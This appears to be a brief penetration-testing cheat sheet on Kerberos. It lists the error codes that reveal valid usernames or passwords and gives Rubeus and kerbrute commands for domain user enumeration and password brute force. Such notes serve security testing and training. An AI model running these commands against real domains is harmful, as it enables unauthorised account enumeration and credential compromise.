Kerberos
#rubeus #kerbrute
Brute Force
We can brute force username and password based on the errors that we get from kerberos.
KDC_ERR_PREAUTH_FAILED: Incorrect passwordKDC_ERR_C_PRINCIPAL_UNKNOWN: Invalid usernameKDC_ERR_WRONG_REALM: Invalid domainKDC_ERR_CLIENT_REVOKED: Disabled/Blocked user
Rubeus
./rubeus.exe brute /password:<password> /noticketKerbrute (go)
User Enumeration
./kerbrute userenum -d mydomain.local usernames.txtPassword brute-force
cat user_password.txt | ./kerbrute -d mydomain.local bruteforce -Kerbrute.py
python kerbrute.py -domain mydomain.local -users user.txt -passwords pass.txt -dc-ip <ip>Last updated